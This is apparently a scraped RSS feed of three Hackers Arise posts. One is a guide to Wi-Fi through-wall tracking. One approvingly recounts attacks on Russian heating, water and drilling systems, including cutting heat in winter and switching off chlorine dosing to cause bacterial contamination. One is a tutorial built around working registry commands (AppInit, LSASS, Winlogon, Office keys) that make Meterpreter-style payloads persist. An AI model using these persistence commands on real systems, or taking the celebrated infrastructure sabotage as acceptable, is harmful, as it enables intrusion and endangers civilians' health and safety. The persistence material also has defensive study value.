<content:encoded><![CDATA[<h1 class="wp-block-heading has-medium-font-size" id="how-wi-fi-sensing-sees-through-walls-an-occupythew">Welcome back, my aspiring cyberwarriors!</h1>
The quick answer is “Yes!”.
It might seem like science fiction, but now we have the capability to “see” through walls and track the location and movement of targets. This is thanks to new technological developments in both artificial intelligence and SDR. Remember, Wi-Fi is simply sending and receiving radio signals at 2.45Ghz. If an object is in the way of the signal, it bounces, bends and refracts the signal. This perturbing of the signal can be very complex but advances in machine learning (ML) and AI now make it possible to to collect and track those changes in the signal and determine if it’s a human, dog, or an intruder. This is the beginning of something exciting, and quite possibly, malicious.
This is one more reason why we say that SDR (Signals Intelligence) for Hackers is the leading edge of cybersecurity!
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="733" height="412" src="https://hackers-arise.com/wp-content/uploads/2025/06/wifi-see-through-walls.png" alt="" class="wp-image-15959" srcset="https://hackers-arise.com/wp-content/uploads/2025/06/wifi-see-through-walls.png 733w, https://hackers-arise.com/wp-content/uploads/2025/06/wifi-see-through-walls-300x169.png 300w" sizes="(max-width: 733px) 100vw, 733px" /></figure>
<h2 class="wp-block-heading has-large-font-size">The Science Behind Wi-Fi Sensing</h2>
<h2 class="wp-block-heading has-medium-font-size">How It Works</h2>
<ul class="wp-block-list">
<li>Wi-Fi signals are electromagnetic waves that can pass through common wall materials like drywall, wood, and even concrete (with some signal loss).</li>
<li>When these signals encounter objects, especially humans, they reflect, scatter, and diffract.</li>
<li>By analyzing how Wi-Fi signals bounce back, it’s possible to detect the presence, movement, and even the shape of people behind walls.</li>
</ul>
<h2 class="wp-block-heading has-medium-font-size">Key Concepts</h2>
<ul class="wp-block-list">
<li>Phase and Amplitude: The changes in phase and amplitude of the Wi-Fi signal carry information about what the signal has encountered.</li>
<li>Multipath Propagation: Wi-Fi signals reflect off multiple surfaces, producing a complex pattern that can be decoded to reveal movement and location.</li>
<li>DensePose & Neural Networks: Modern systems use AI to map Wi-Fi signal changes to specific points on the human body, reconstructing pose and movement in 3D.</li>
</ul>
<h2 class="wp-block-heading has-medium-font-size">The Hardware</h2>
You don’t need military-grade gear. Here’s what’s commonly used:
<ul class="wp-block-list">
<li>Standard Wi-Fi Routers: Most experiments use commodity routers with multiple antennas.</li>
<li>Software-Defined Radios (SDRs): For more control and precision, SDRs like the HackRF or USRP can be used (see our tutorials and trainings on SDR for Hackers)</li>
<li>Multiple Antennas: At least two, but three or more improves accuracy and resolution.</li>
</ul>
<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" width="592" height="579" src="https://hackers-arise.com/wp-content/uploads/2025/07/HackRF.png" alt="" class="wp-image-15967" style="width:392px;height:auto" srcset="https://hackers-arise.com/wp-content/uploads/2025/07/HackRF.png 592w, https://hackers-arise.com/wp-content/uploads/2025/07/HackRF-300x293.png 300w" sizes="(max-width: 592px) 100vw, 592px" /></figure>
<h2 class="wp-block-heading has-medium-font-size">The Software</h2>
<h2 class="wp-block-heading has-medium-font-size">Data Collection</h2>
<ul class="wp-block-list">
<li>Transmit & Receive: One device sends out Wi-Fi signals, another listens for reflections.</li>
<li>Channel State Information (CSI): This is the raw data showing how signals have changed after bouncing off objects.</li>
</ul>
<h2 class="wp-block-heading has-medium-font-size">Processing</h2>
<ul class="wp-block-list">
<li>Signal Processing: Algorithms filter out static objects (walls, furniture) and focus on moving targets (people).</li>
<li>Neural Networks: AI models such as <a href="http://densepose.org/" title="">DensePose</a> map signal changes to body coordinates, reconstructing a “pose” for each detected person</li>
</ul>
<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" width="1280" height="720" src="https://hackers-arise.com/wp-content/uploads/2025/07/densepose-2.jpg" alt="" class="wp-image-15969" style="width:700px;height:auto" srcset="https://hackers-arise.com/wp-content/uploads/2025/07/densepose-2.jpg 1280w, https://hackers-arise.com/wp-content/uploads/2025/07/densepose-2-300x169.jpg 300w, https://hackers-arise.com/wp-content/uploads/2025/07/densepose-2-1024x576.jpg 1024w, https://hackers-arise.com/wp-content/uploads/2025/07/densepose-2-768x432.jpg 768w" sizes="(max-width: 1280px) 100vw, 1280px" /></figure>
<h2 class="wp-block-heading has-large-font-size">Wi-Fi Sensing in Action</h2>
<h2 class="wp-block-heading">Step 1: Set Up Your Equipment</h2>
<ul class="wp-block-list">
<li>Place a Wi-Fi transmitter and receiver on opposite sides of the wall.</li>
<li>Ensure both devices can log CSI data. Some routers can be flashed with custom firmware (e.g., <a href="https://hackers-arise.com/introduction-to-the-iot-embedded-linux-the-openwrt-project/" target="_blank" rel="noopener ugc" title="OpenWRT">OpenWRT</a>) to access this.</li>
</ul>
<figure class="wp-block-image size-full is-resized"><img loading="lazy" decoding="async" width="597" height="290" src="https://hackers-arise.com/wp-content/uploads/2025/07/openwrt-splash.png" alt="" class="wp-image-15970" style="width:634px;height:auto" srcset="https://hackers-arise.com/wp-content/uploads/2025/07/openwrt-splash.png 597w, https://hackers-arise.com/wp-content/uploads/2025/07/openwrt-splash-300x146.png 300w" sizes="(max-width: 597px) 100vw, 597px" /></figure>
<h2 class="wp-block-heading">Step 2: Collect CSI Data</h2>
<ul class="wp-block-list">
<li>Use tools like <a href="https://github.com/xieyaxiongfly/Atheros-CSI-Tool" title="">Atheros CSI Tool</a> or Intel 5300 CSI Tool to capture the raw signal data.</li>
<li>Move around on the far side of the wall to generate reflections.</li>
</ul>
<h2 class="wp-block-heading">Step 3: Process the Data</h2>
<ul class="wp-block-list">
<li>Use Python libraries or MATLAB scripts to process the CSI data.</li>
<li>Apply filters to remove noise and static reflections.</li>
<li>Feed the cleaned data into a pre-trained neural network (like <a href="http://densepose.org/" title="">DensePose</a>) to reconstruct human poses</li>
</ul>
<h2 class="wp-block-heading">Step 4: Visualize the Results</h2>
<ul class="wp-block-list">
<li>The output can be a 2D or 3D “stick figure” or heatmap showing where people are and how they’re moving.</li>
<li>Some setups can even distinguish between individuals based on movement patterns.</li>
</ul>
<h2 class="wp-block-heading has-large-font-size">Limitations and Considerations</h2>
<ul class="wp-block-list">
<li>Wall Material: Thicker or metal-reinforced walls reduce accuracy.</li>
<li>Privacy: This technology raises major privacy concerns—anyone with the right tools could potentially “see” through your walls.</li>
<li>Legality: Unauthorized use of such technology may violate laws or regulations.</li>
</ul>
<h2 class="wp-block-heading has-large-font-size">Real-World Applications</h2>
<ul class="wp-block-list">
<li>Security: Detecting intruders or monitoring restricted areas. Companies like TruShield are offering commercial home security systems based upon this technology.</li>
<li>Elder Care: Monitoring movement for safety without cameras.</li>
<li>Smart Homes: Automating lighting or HVAC based on occupancy.</li>
<li>Law Enforcement: Law enforcement agencies can detect and track suspects in their homes</li>
<li>Intelligence Agencies: Can Use this technology to track spies or other suspects.</li>
</ul>
<h2 class="wp-block-heading">Summary</h2>
Wi-Fi sensing is a powerful, rapidly advancing field. With basic hardware (HackRF) and open-source tools, it’s possible to experiment with through-wall detection. This opens a whole new horizon in Wi-Fi Hacking and SDR for Hackers.
For more on this technology, attend our upcoming Wi-Fi Hacking training, July 22-24. If you are interested in building this device, look for our 2026 SDR for Hackers training.
As always, use this knowledge responsibly and be aware of the ethical and legal implications.
<h2 class="wp-block-heading" id="trushield-hacking-the-airwaves-for-home-security"></h2>
<h2 class="wp-block-heading"></h2>

The post <a href="https://hackers-arise.com/can-hackers-see-inside-your-home-using-wi-fi-to-tr/">Can Hackers “See” Inside Your Home Using Wi-Fi to Track Your Location and Movement?</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></content:encoded>
<wfw:commentRss>https://hackers-arise.com/can-hackers-see-inside-your-home-using-wi-fi-to-tr/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
</item>
<item>
<title>SCADA Hacking: Inside Russian Facilities, Part 4</title>
<link>https://hackers-arise.com/scada-hacking-inside-russian-facilities-part-4/</link>
<comments>https://hackers-arise.com/scada-hacking-inside-russian-facilities-part-4/#respond</comments>
<dc:creator><![CDATA[Co11ateral]]></dc:creator>
<pubDate>Wed, 10 Sep 2025 02:02:32 +0000</pubDate>
<category><![CDATA[Uncategorized]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=16060</guid>
<description><![CDATA[Part 4 – Cyber Cossacks Ops Welcome back, cyberwarriors. In Part 4 we dig deeper into operations by The Cyber Cossacks alongside other Ukrainian hacker units. We’ll expand on the companies we hit, their backgrounds and how we exploited their SCADA environments. Golfstream – St. Petersburg, Russia OOO Golfstream is one of the leading housing […]
The post <a href="https://hackers-arise.com/scada-hacking-inside-russian-facilities-part-4/">SCADA Hacking: Inside Russian Facilities, Part 4</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></description>
<content:encoded><![CDATA[
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="683" src="https://hackers-arise.com/wp-content/uploads/2025/07/banner-7-1024x683.webp" alt="" class="wp-image-16063" srcset="https://hackers-arise.com/wp-content/uploads/2025/07/banner-7-1024x683.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/07/banner-7-300x200.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/07/banner-7-768x512.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/07/banner-7.webp 1536w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>

<h2 class="wp-block-heading">Part 4 – Cyber Cossacks Ops</h2>
Welcome back, cyberwarriors. In Part 4 we dig deeper into operations by The Cyber Cossacks alongside other Ukrainian hacker units. We’ll expand on the companies we hit, their backgrounds and how we exploited their SCADA environments.
<h2 class="wp-block-heading"><a></a>Golfstream – St. Petersburg, Russia</h2>
OOO Golfstream is one of the leading housing and utilities integrators in St. Petersburg. They hold long-term service contracts with multiple municipal districts: Vasileostrovsky, Petrogradsky, and Krasnogvardeysky. Their core services include district heating management, central pump station monitoring, pressure regulation, and emergency response valves in hundreds of residential complexes and several municipal office buildings. Golfstream’s annual revenue exceeds 1.2 billion rubles, and they maintain service-level agreements guaranteeing at least 99 percent heating uptime.

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="800" height="533" src="https://hackers-arise.com/wp-content/uploads/2025/07/1-golfstream-company.webp" alt="" class="wp-image-16064" srcset="https://hackers-arise.com/wp-content/uploads/2025/07/1-golfstream-company.webp 800w, https://hackers-arise.com/wp-content/uploads/2025/07/1-golfstream-company-300x200.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/07/1-golfstream-company-768x512.webp 768w" sizes="(max-width: 800px) 100vw, 800px" /></figure>

In December, we pivoted into the internal SCADA VLAN using a workstation that had outbound SMB access. Then, we crafted a script to override boiler ignition commands, shutting down circulation pumps one district at a time. Over three consecutive nights, residential temperatures dipped below 5 °C.

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="800" height="626" src="https://hackers-arise.com/wp-content/uploads/2025/07/2-gofstream-scada-1.webp" alt="" class="wp-image-16065" srcset="https://hackers-arise.com/wp-content/uploads/2025/07/2-gofstream-scada-1.webp 800w, https://hackers-arise.com/wp-content/uploads/2025/07/2-gofstream-scada-1-300x235.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/07/2-gofstream-scada-1-768x601.webp 768w" sizes="(max-width: 800px) 100vw, 800px" /><figcaption class="wp-element-caption">Human-Machine Interface screen from the heating system</figcaption></figure>

Their IT team spent hours chasing network errors. On the fourth day, before our final shutdown, we encrypted OS volumes on all SCADA hosts. Boiler control HMIs failed to start, leaving many without heat. The total financial loss, including emergency generators and housing compensation, is yet unknown.

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="800" height="493" src="https://hackers-arise.com/wp-content/uploads/2025/07/3-golfstream-scada-2.webp" alt="" class="wp-image-16066" srcset="https://hackers-arise.com/wp-content/uploads/2025/07/3-golfstream-scada-2.webp 800w, https://hackers-arise.com/wp-content/uploads/2025/07/3-golfstream-scada-2-300x185.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/07/3-golfstream-scada-2-768x473.webp 768w" sizes="(max-width: 800px) 100vw, 800px" /><figcaption class="wp-element-caption">Boiler System Overview</figcaption></figure>

<h2 class="wp-block-heading">Water Utility – Drozhannoe, Republic of Tatarstan</h2>
Drozhannoe is a rural settlement located 90 km northeast of Kazan. The local economy revolves around grain farming, dairy production, and small-scale poultry operations. The village council outsources the management of water wells to an external utility company.

<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="410" src="https://hackers-arise.com/wp-content/uploads/2025/07/4-drozhannoe-municipal-building-1024x410.webp" alt="" class="wp-image-16067" srcset="https://hackers-arise.com/wp-content/uploads/2025/07/4-drozhannoe-municipal-building-1024x410.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/07/4-drozhannoe-municipal-building-300x120.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/07/4-drozhannoe-municipal-building-768x307.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/07/4-drozhannoe-municipal-building.webp 1280w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>

The Drozhannoe water system relies on a few aging control devices running outdated software. Data from the system, such as water flow and treatment levels is sent to a basic interface with limited security.
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="935" height="507" src="https://hackers-arise.com/wp-content/uploads/2025/07/5-drozhannoe-scada.webp" alt="" class="wp-image-16068" srcset="https://hackers-arise.com/wp-content/uploads/2025/07/5-drozhannoe-scada.webp 935w, https://hackers-arise.com/wp-content/uploads/2025/07/5-drozhannoe-scada-300x163.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/07/5-drozhannoe-scada-768x416.webp 768w" sizes="(max-width: 935px) 100vw, 935px" /><figcaption class="wp-element-caption">Liquid storage and pumping control system with the chlorine pump (shown with the X) off</figcaption></figure>

After gaining access to it, we modified dosing parameters, shutting off the chlorine pump. Our goal was bacterial contamination, that would force the council to close wells and distribute bottled water from Kazan. Seeing the service provider trying to fix this issue, we wiped the system along with the hard drives that stored backups.
<h2 class="wp-block-heading"><a></a>Polykod – Moscow, Russia</h2>
Polykod is a mid-sized engineering firm with 450 employees and annual revenue of 3 billion rubles. They specialize in SCADA and DCS systems for oil and gas clients, including major projects for Gazprom, Lukoil, and Tatneft. Their portfolio has remote well monitoring, pipeline pump station automation, and compressor station control across Siberia and the Volga region. The company maintains their network operations center in Moscow’s Presnensky District. 
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="800" height="534" src="https://hackers-arise.com/wp-content/uploads/2025/07/6-polykov-drilling-station.webp" alt="" class="wp-image-16069" srcset="https://hackers-arise.com/wp-content/uploads/2025/07/6-polykov-drilling-station.webp 800w, https://hackers-arise.com/wp-content/uploads/2025/07/6-polykov-drilling-station-300x200.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/07/6-polykov-drilling-station-768x513.webp 768w" sizes="(max-width: 800px) 100vw, 800px" /></figure>

During reconnaissance on Shodan, we found Polykod running outdated software with an authentication bypass. We exploited that to drop a stager, then harvested service account hashes used across their environment. With those hashes, we gained access to a few SCADA servers and moved laterally through the corporate network. In just a few days, we were able to connect to and interact with four computer systems at distant drilling sites.

<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="532" src="https://hackers-arise.com/wp-content/uploads/2025/07/7-polykov-project-1-1024x532.webp" alt="" class="wp-image-16070" srcset="https://hackers-arise.com/wp-content/uploads/2025/07/7-polykov-project-1-1024x532.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/07/7-polykov-project-1-300x156.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/07/7-polykov-project-1-768x399.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/07/7-polykov-project-1.webp 1200w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">3D geological model showing well placements</figcaption></figure>

When we got into the system, we changed the settings that control how fast the pumps run. This caused sudden spikes in pressure, which triggered safety systems to shut things down. The drilling teams saw pumps stopping for no clear reason and had to deal with emergency shutdowns. Alarms went off, and engineers had to take over control manually. The goal was simply to cause havoc. Then one morning, we erased key control servers and installed ransomware that locked out both Polykod employees and their clients.

<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="800" height="395" src="https://hackers-arise.com/wp-content/uploads/2025/07/8-polykod-drilling-project-2.webp" alt="" class="wp-image-16071" srcset="https://hackers-arise.com/wp-content/uploads/2025/07/8-polykod-drilling-project-2.webp 800w, https://hackers-arise.com/wp-content/uploads/2025/07/8-polykod-drilling-project-2-300x148.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/07/8-polykod-drilling-project-2-768x379.webp 768w" sizes="(max-width: 800px) 100vw, 800px" /><figcaption class="wp-element-caption">Pump management showing pressure rates</figcaption></figure>

<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="543" src="https://hackers-arise.com/wp-content/uploads/2025/07/9-polykod-drilling-station-scada-1024x543.webp" alt="" class="wp-image-16072" srcset="https://hackers-arise.com/wp-content/uploads/2025/07/9-polykod-drilling-station-scada-1024x543.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/07/9-polykod-drilling-station-scada-300x159.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/07/9-polykod-drilling-station-scada-768x407.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/07/9-polykod-drilling-station-scada.webp 1280w" sizes="(max-width: 1024px) 100vw, 1024px" /><figcaption class="wp-element-caption">Drilling rig monitoring system showing RPM at 0</figcaption></figure>

<h2 class="wp-block-heading">Conclusion</h2>
Essential services like water, heating, and oil rely on SCADA systems that, if compromised, can shut down communities or disrupt energy supplies. Thankfully, Russians don’t bother with enforcing regular updates, better network design and constant monitoring, so these systems will stay vulnerable to future attacks.
The post <a href="https://hackers-arise.com/scada-hacking-inside-russian-facilities-part-4/">SCADA Hacking: Inside Russian Facilities, Part 4</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></content:encoded>
<wfw:commentRss>https://hackers-arise.com/scada-hacking-inside-russian-facilities-part-4/feed/</wfw:commentRss>
<slash:comments>0</slash:comments>
</item>
<item>
<title>Advanced Windows Persistence, Part 2: Using the Registry to Maintain Persistence</title>
<link>https://hackers-arise.com/advanced-windows-persistence-part-2-using-the-registry-to-maintain-persistence/</link>
<dc:creator><![CDATA[Co11ateral]]></dc:creator>
<pubDate>Tue, 09 Sep 2025 15:07:45 +0000</pubDate>
<category><![CDATA[Command and Control (C2)]]></category>
<category><![CDATA[Cyberwar]]></category>
<category><![CDATA[Cyberwarrior]]></category>
<category><![CDATA[Metasploit]]></category>
<category><![CDATA[Powershell]]></category>
<category><![CDATA[Windows]]></category>
<category><![CDATA[advanced persistence]]></category>
<category><![CDATA[AppInit DLL injection]]></category>
<category><![CDATA[cyberwarfare]]></category>
<category><![CDATA[HACKING]]></category>
<category><![CDATA[HKCU persistence]]></category>
<category><![CDATA[LSASS persistence]]></category>
<category><![CDATA[offensive security]]></category>
<category><![CDATA[Office registry keys]]></category>
<category><![CDATA[post-exploitation]]></category>
<category><![CDATA[privilege abuse]]></category>
<category><![CDATA[reboot survival]]></category>
<category><![CDATA[red team tactics]]></category>
<category><![CDATA[registry persistence]]></category>
<category><![CDATA[stealth backdoors]]></category>
<category><![CDATA[Windows persistence]]></category>
<category><![CDATA[Winlogon hijack]]></category>
<guid isPermaLink="false">https://hackers-arise.com/?p=17878</guid>
<description><![CDATA[Learn registry-based Windows persistence with AppInit DLLs, LSASS packages, Winlogon hijacks, and Office keys. These methods survive reboots.
The post <a href="https://hackers-arise.com/advanced-windows-persistence-part-2-using-the-registry-to-maintain-persistence/">Advanced Windows Persistence, Part 2: Using the Registry to Maintain Persistence</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.]]></description>
<content:encoded><![CDATA[Welcome back, aspiring cyberwarriors! 
Persistence on Windows systems has always been a cat-and-mouse game between attackers looking for reliable footholds and defenders trying to close down avenues of abuse. Windows itself provides a wide range of mechanisms that are legitimate parts of system functionality, yet each of them can be turned into a way of ensuring malicious code runs again and again after reboot or logon. Registry values, system processes, and initialization routines are all potential targets for persistence, and while most of them were never designed with security in mind, they remain available today. What makes them attractive is durability: once configured, they survive restarts and provide repeated execution opportunities without requiring the attacker to manually re-enter the environment.
The techniques described here are all examples of registry-based persistence, each with its own advantages, drawbacks, and detection footprints. Understanding them is crucial for both attackers who rely on stability and defenders who need to spot tampering before it causes damage.
<h2 class="wp-block-heading">AppInit</h2>
AppInit is a legacy Windows feature that tells the OS loader to map one or more DLLs into any process that links user32.dll. That means when many GUI apps start, Windows will automatically load the DLLs listed in that registry value, giving whatever code is inside those DLLs a chance to run inside those processes. It’s a registry-based, machine-wide mechanism that survives reboot and affects both 32-bit and 64-bit GUI applications when configured.
<code>cmd#> reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t reg_dword /d 0x1 /f</code>
<code>cmd#> reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t reg_sz /d "C:\meter64.dll" /f</code>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="970" height="174" src="https://hackers-arise.com/wp-content/uploads/2025/09/1-appinit-persistence-technique.webp" alt="AppInit windows persistence technique" class="wp-image-17879" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/1-appinit-persistence-technique.webp 970w, https://hackers-arise.com/wp-content/uploads/2025/09/1-appinit-persistence-technique-300x54.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/1-appinit-persistence-technique-768x138.webp 768w" sizes="(max-width: 970px) 100vw, 970px" /></figure>
<code>cmd#> reg add "HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t reg_dword /d 0x1 /f</code>
<code>cmd#> reg add "HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t reg_sz /d "C:\meter32.dll" /f</code>
The first command turns the AppInit behavior on for the 64-bit registry view. The second command writes the path to the DLL(s) that Windows should try to load into GUI processes (this value is a string of one or more DLL paths). The next two commands do the same thing for the 32-bit registry view on a 64-bit system. First it will enable the mechanism for 32-bit processes, and then set the 32-bit DLL path.
In plain terms: enable AppInit, tell Windows which DLLs to load, and do it for both 64-bit and 32-bit processes so GUI apps of both architectures will load the specified libraries.
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="997" height="144" src="https://hackers-arise.com/wp-content/uploads/2025/09/2-appinit-persistence-connection-received.webp" alt="AppInit persistence initiated a connection back" class="wp-image-17880" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/2-appinit-persistence-connection-received.webp 997w, https://hackers-arise.com/wp-content/uploads/2025/09/2-appinit-persistence-connection-received-300x43.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/2-appinit-persistence-connection-received-768x111.webp 768w" sizes="(max-width: 997px) 100vw, 997px" /></figure>
Pros: survives reboots and causes the DLL to be loaded into many GUI processes automatically, giving broad coverage without per-user startup entries.
Cons: requires administrative rights to change HKLM, is noisy because the DLL will appear loaded in many processes (creating strong telemetry), and relies on an older, well-known mechanism that defenders often check.
If you’re a defender, focus on auditing the HKLM Windows keys (including the Wow6432Node path) and monitoring unusual DLL loads into system or common GUI processes.
<h2 class="wp-block-heading">LSASS</h2>
Modifying LSASS’s configuration to load an extra DLL is a way to get code executed inside a highly privileged, long-lived system process. LSASS is responsible for enforcing security policy and handling credentials. Because it loads configured authentication/notification packages at startup, adding an entry here causes the chosen module to be loaded into that process and remain active across reboots. That makes it powerful, but dangerous.
<code>cmd#> reg add "HKLM\system\currentcontrolset\control\lsa" /v "Notification Packages" /t reg_multi_sz /d "rassfm\0scecli\0meter" /f</code>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="961" height="116" src="https://hackers-arise.com/wp-content/uploads/2025/09/3-lsass-persistence-technique.webp" alt="LSASS windows peristence technique" class="wp-image-17881" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/3-lsass-persistence-technique.webp 961w, https://hackers-arise.com/wp-content/uploads/2025/09/3-lsass-persistence-technique-300x36.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/3-lsass-persistence-technique-768x93.webp 768w" sizes="(max-width: 961px) 100vw, 961px" /></figure>
The registry command updates Notification Packages multi-string under the LSA key. In simple terms, this line tells Windows “when LSASS starts, also load the packages named <code>rassfm</code>, <code>scecli</code>, <code>meter</code> and force the write if the value already exists.”
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="903" height="142" src="https://hackers-arise.com/wp-content/uploads/2025/09/4-lsass-connection-received-1.webp" alt="LSASS persistence initiated a connection back" class="wp-image-17888" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/4-lsass-connection-received-1.webp 903w, https://hackers-arise.com/wp-content/uploads/2025/09/4-lsass-connection-received-1-300x47.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/4-lsass-connection-received-1-768x121.webp 768w" sizes="(max-width: 903px) 100vw, 903px" /></figure>
Pros: survives reboots and places code inside a long-running, high-privilege process, making the persistence both durable and powerful.
Cons: requires administrative privileges to change the LSA registry, produces extremely high-risk telemetry and stability impact (misconfiguration or a buggy module can crash LSASS and destabilize or render the system unusable), and it is highly suspicious to defenders.
Putting code into LSASS buys durability and access to sensitive material, but it is one of the loudest and riskiest persistence techniques: it demands admin rights, creates strong signals for detection, and can crash the machine if done incorrectly.
<h2 class="wp-block-heading">Winlogon</h2>
Winlogon is the component that handles interactive user logons, and it calls the program(s) listed in the <code>UserInit</code> registry value after authentication completes. By appending an additional executable to that <code>UserInit</code> string you ensure your program is launched automatically every time someone signs in interactively. 
<code>cmd#> reg add "HKLM\software\microsoft\windows nt\currentversion\winlogon" /v UserInit /t reg_sz /d "c:\windows\system32\userinit.exe, c:\meter.exe"</code>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="970" height="192" src="https://hackers-arise.com/wp-content/uploads/2025/09/5-winlogon-persistence-technique.webp" alt="Winlogon persistence technique" class="wp-image-17884" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/5-winlogon-persistence-technique.webp 970w, https://hackers-arise.com/wp-content/uploads/2025/09/5-winlogon-persistence-technique-300x59.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/5-winlogon-persistence-technique-768x152.webp 768w" sizes="(max-width: 970px) 100vw, 970px" /></figure>
This keeps the normal <code>userinit.exe</code> first and appends <code>c:\meter.exe</code>, so when Winlogon runs it will launch <code>userinit.exe</code> and then <code>meter.exe</code> as part of the logon sequence. Be aware that <code>UserInit</code> must include the legitimate <code>userinit.exe</code> path first. Removing or misordering it can break interactive logons and lock users out.
<figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="139" src="https://hackers-arise.com/wp-content/uploads/2025/09/6-winlogon-persistence-connection-received-1024x139.webp" alt="Winlogon persistence initiated a connection back" class="wp-image-17885" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/6-winlogon-persistence-connection-received-1024x139.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/09/6-winlogon-persistence-connection-received-300x41.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/6-winlogon-persistence-connection-received-768x104.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/09/6-winlogon-persistence-connection-received.webp 1064w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
Pros: survives reboots and reliably executes at every interactive user logon, giving consistent persistence across sessions.
Cons: requires administrative privileges to change HKLM, offers no scheduling control (it only runs at logon), and is risky, since misconfiguring the UserInit value can prevent users from logging in and produces obvious forensic signals.
<h2 class="wp-block-heading">Microsoft Office</h2>
Many Office components read configuration from the current user’s registry hive, and attackers can abuse that by inserting a path or DLL name that Office will load or reference when the user runs the suite. This approach is per-user and survives reboots because the configuration is stored in HKCU, but it only triggers when the victim actually launches the Office component that reads that key. It’s useful when the target regularly uses Office and you want a simple, low-privilege persistence mechanism that doesn’t require installing a service or touching machine-wide autoruns.
<code>cmd$> reg add "HKCU\Software\Microsoft\Office test\Special\Perf" /t REG_SZ /d C:\meter.dll</code>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="795" height="140" src="https://hackers-arise.com/wp-content/uploads/2025/09/7-office-persistence-technique.webp" alt="Microsoft Office windows persistence technique" class="wp-image-17886" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/7-office-persistence-technique.webp 795w, https://hackers-arise.com/wp-content/uploads/2025/09/7-office-persistence-technique-300x53.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/7-office-persistence-technique-768x135.webp 768w" sizes="(max-width: 795px) 100vw, 795px" /></figure>
<figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="903" height="171" src="https://hackers-arise.com/wp-content/uploads/2025/09/8-office-persistence-connection-received.webp" alt="Microsoft Office persistence initiated a connection back" class="wp-image-17887" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/8-office-persistence-connection-received.webp 903w, https://hackers-arise.com/wp-content/uploads/2025/09/8-office-persistence-connection-received-300x57.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/8-office-persistence-connection-received-768x145.webp 768w" sizes="(max-width: 903px) 100vw, 903px" /></figure>
Pros: survives reboots and works from a normal user account because it lives in HKCU, so no administrative rights are required.
Cons: there’s no scheduling control, it only triggers when the user launches the relevant Office component, so you cannot control an execution interval.
<h2 class="wp-block-heading">Summary</h2>
